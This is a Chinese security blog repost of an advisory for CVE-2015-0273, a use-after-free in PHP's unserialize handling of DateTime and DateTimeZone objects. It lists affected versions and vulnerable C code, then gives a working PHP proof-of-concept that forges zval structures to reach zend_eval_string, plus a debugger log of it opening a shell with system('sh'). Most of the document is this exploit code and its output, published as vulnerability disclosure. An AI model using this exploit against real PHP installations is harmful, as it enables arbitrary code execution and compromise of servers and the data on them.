记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

[CVE-2015-0273]Use After Free 漏洞【附POC】

2015-03-02 11:05

t019e0adb7a4ed653d6.jpg

一个use-after-free 漏洞被发现在unserialize() 的DateTime/DateTimeZone 对象的__wakeup()魔法方法。可被滥用泄漏任意内存块和远程执行任意代码。

受影响版本

PHP 5.6 < 5.6.6

PHP 5.5 < 5.5.22

PHP 5.4 < 5.4.38

PHP 5.3 <= 5.3.29

版权

这个漏洞由 Taoguang Chen发现

描述

static int php_date_initialize_from_hash(php_date_obj **dateobj, HashTable *myht)
{
    zval             *z_date;
    zval             *z_timezone;
    zval             *z_timezone_type;
    zval              tmp_obj;
    timelib_tzinfo   *tzi;
    php_timezone_obj *tzobj;
    z_date = zend_hash_str_find(myht, "date", sizeof("data")-1);
    if (z_date) {
        convert_to_string(z_date);
        z_timezone_type = zend_hash_str_find(myht, "timezone_type", sizeof("timezone_type")-1);
        if (z_timezone_type) {
            convert_to_long(z_timezone_type);
            z_timezone = zend_hash_str_find(myht, "timezone", sizeof("timezone")-1);
            if (z_timezone) {
                convert_to_string(z_timezone);
...
static int php_date_timezone_initialize_from_hash(zval **return_value, php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC)
{
    zval            **z_timezone = NULL;
    zval            **z_timezone_type = NULL;
    if (zend_hash_find(myht, "timezone_type", 14, (void**) &z_timezone_type) == SUCCESS) {
        if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) {
            convert_to_long(*z_timezone_type);
            if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone) TSRMLS_CC)) {
                return SUCCESS;
            }
        }
    }
    return FAILURE;
}

 

convert_to_long() 导致ZVAL和全部它的子对象都从内存中释放。然而unserialize()代码仍然可以使用R或r,指向被释放的内存。这就是一个UAF漏洞,导致执行任意代码。

POC

这个POC测试在MacOSX 10.10.2和PHP 5.5.14.

<?php
$f = $argv[1];
$c = $argv[2];
$fakezval1 = ptr2str(0x100b83008);
$fakezval1 .= ptr2str(0x8);
$fakezval1 .= "\x00\x00\x00\x00";
$fakezval1 .= "\x06";
$fakezval1 .= "\x00";
$fakezval1 .= "\x00\x00";
$data1 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}';
$x = unserialize($data1);
$y = $x[2];
// zend_eval_string()'s address
$y[0][0] = "\x6d";
$y[0][1] = "\x1e";
$y[0][2] = "\x35";
$y[0][3] = "\x00";
$y[0][4] = "\x01";
$y[0][5] = "\x00";
$y[0][6] = "\x00";
$y[0][7] = "\x00";
$fakezval2 = ptr2str(0x3b296324286624); // $f($c);
$fakezval2 .= ptr2str(0x100b83000);
$fakezval2 .= "\x00\x00\x00\x00";
$fakezval2 .= "\x05";
$fakezval2 .= "\x00";
$fakezval2 .= "\x00\x00";
$data2 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}';
$z = unserialize($data2);
function ptr2str($ptr)
{
    $out = "";
    for ($i=0; $i<8; $i++) {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}
?>

在命令行执行,可执行任意php代码。

$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)"
Process 13472 launched: '/usr/bin/php' (x86_64)
sh: no job control in this shell
sh-3.2$ php -v
PHP 5.5.14 (cli) (built: Sep  9 2014 19:09:25) 
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
sh-3.2$ exit
exit
Process 13472 exited with status = 0 (0x00000000) 
(lldb)

Taoguang Chen <@chtg> - Write Date: 2015.1.29 - Release Date: 2015.2.20

知识来源: www.cnxhacker.com/2015/02/28/7487.html

阅读:107887 | 评论:0 | 标签:漏洞分析 CVE-2015-0273 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“[CVE-2015-0273]Use After Free 漏洞【附POC】”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云